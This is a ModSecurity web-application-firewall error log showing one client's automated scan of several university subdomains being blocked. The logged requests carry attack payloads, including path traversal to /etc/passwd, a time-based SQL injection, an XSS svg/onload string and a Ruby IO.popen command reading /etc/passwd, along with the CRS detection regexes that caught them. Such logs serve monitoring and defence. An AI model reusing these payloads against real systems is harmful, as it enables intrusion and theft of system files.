[Tue Aug 29 11:44:03.661166 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAdb7xAAAAAb"]
[Tue Aug 29 11:44:03.681138 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAdb7xEAAAAb"]
[Tue Aug 29 11:44:03.720471 2023] [:error] [pid 2041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAf53SAAAAAR"]
[Tue Aug 29 11:44:03.739312 2023] [:error] [pid 2041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAf53SEAAAAR"]
[Tue Aug 29 11:44:04.384656 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13lMCo-f0AAAfGabEAAAAT"]
[Tue Aug 29 11:44:05.388647 2023] [:error] [pid 2021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13lcCo-f0AAAfloRQAAAAj"]
[Tue Aug 29 11:44:07.383084 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13l8Co-f0AAAeX1MIAAAAK"]
[Tue Aug 29 11:44:07.384051 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13l8Co-f0AAAfky9sAAAAi"]
[Tue Aug 29 11:44:07.385044 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13l8Co-f0AAAdQ3owAAAAV"]
[Tue Aug 29 11:44:07.398492 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/download.do"] [unique_id "ZO13l8Co-f0AAAcsLQcAAAAE"]
[Tue Aug 29 11:44:08.376121 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAfZj2cAAAAN"]
[Tue Aug 29 11:44:08.391440 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13mMCo-f0AAAfcoOEAAAAa"]
[Tue Aug 29 11:44:08.396534 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13mMCo-f0AAAdfteYAAAAG"]
[Tue Aug 29 11:44:08.400528 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAc4EvsAAAAP"]
[Tue Aug 29 11:44:08.401666 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAdOeYsAAAAS"]
[Tue Aug 29 11:44:08.412808 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAfWN0sAAAAL"]
[Tue Aug 29 11:44:08.427612 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAdxUcsAAAAC"]
[Tue Aug 29 11:44:08.439604 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAdeQ9sAAAAQ"]
[Tue Aug 29 11:44:08.439912 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAfky@EAAAAi"]
[Tue Aug 29 11:44:08.441951 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAdQ3pAAAAAV"]
[Tue Aug 29 11:44:08.442987 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAfGabYAAAAT"]
[Tue Aug 29 11:44:08.450960 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAeX1McAAAAK"]
[Tue Aug 29 11:44:09.443476 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mcCo-f0AAAenGegAAAAM"]
[Tue Aug 29 11:44:09.600338 2023] [:error] [pid 2019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mcCo-f0AAAfjGOkAAAAh"]
[Tue Aug 29 11:44:10.389477 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAc4EwAAAAAP"]
[Tue Aug 29 11:44:10.508671 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAc4EwQAAAAP"]
[Tue Aug 29 11:44:10.640607 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAcvBrQAAAAJ"]
[Tue Aug 29 11:44:10.651040 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAdTBKUAAAAY"]
[Tue Aug 29 11:44:10.677260 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAeX1MsAAAAK"]
[Tue Aug 29 11:44:11.416565 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13m8Co-f0AAAfcoOkAAAAa"]
[Tue Aug 29 11:44:13.364864 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAdeQ-IAAAAQ"]
[Tue Aug 29 11:44:13.411519 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAdOeZAAAAAS"]
